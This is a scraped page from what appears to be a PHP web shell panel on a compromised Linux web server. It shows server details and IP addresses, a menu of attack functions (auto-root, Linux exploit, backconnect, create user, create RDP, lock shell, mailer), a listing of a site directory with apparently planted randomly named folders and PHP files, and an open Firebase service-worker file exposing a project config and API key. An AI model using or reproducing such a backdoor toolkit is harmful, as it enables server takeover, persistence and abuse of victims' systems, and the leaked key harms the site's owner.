Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.169
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechs.tech /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
application
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
c1gidpm
[ DIR ]
drwxr-xr-x
dummyimage
[ DIR ]
drwxr-xr-x
eobidyj
[ DIR ]
drwxr-xr-x
jongmdz
[ DIR ]
drwxr-xr-x
moctfsw
[ DIR ]
drwxr-xr-x
product-images
[ DIR ]
drwxr-xr-x
ptbucxj
[ DIR ]
drwxr-xr-x
rdmnfqy
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
vqps1le
[ DIR ]
drwxr-xr-x
xbz1flg
[ DIR ]
drwxr-xr-x
.htaccess
199
B
-rw-r--r--
222.php
15.76
KB
-rw-r--r--
composer.json
709
B
-rw-r--r--
composer.lock
44.11
KB
-rw-r--r--
def.html
263
B
-rw-r--r--
env
310
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
firebase-messaging-sw.js
1.12
KB
-rw-r--r--
index.php
49
B
-rw-r--r--
random.php
52.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firebase-messaging-sw.js
importScripts('https://www.gstatic.com/firebasejs/7.17.1/firebase-app.js'); importScripts('https://www.gstatic.com/firebasejs/7.17.1/firebase-messaging.js'); /*Update this config*/ var config = { apiKey: "AIzaSyAmQ43V5XgOtd9Yd_wo-FROpkQ3tWLqcX0", authDomain: "my-apps-project-9ba31.firebaseapp.com", databaseURL: "https://my-apps-project-9ba31.firebaseio.com", projectId: "my-apps-project-9ba31", storageBucket: "my-apps-project-9ba31.appspot.com", messagingSenderId: "562824560989", appId: "1:562824560989:web:7f068c5adbf5436210e8b4" }; firebase.initializeApp(config); const messaging = firebase.messaging(); messaging.setBackgroundMessageHandler(function(payload) { console.log('[firebase-messaging-sw.js] Received background message ', payload); // Customize notification here const notificationTitle = payload.data.title; const notificationOptions = { body: payload.data.body, icon: 'http://localhost/gcm-push/img/icon.png', image: 'http://localhost/gcm-push/img/d.png' }; return self.registration.showNotification(notificationTitle, notificationOptions); }); // [END background_handler]
Close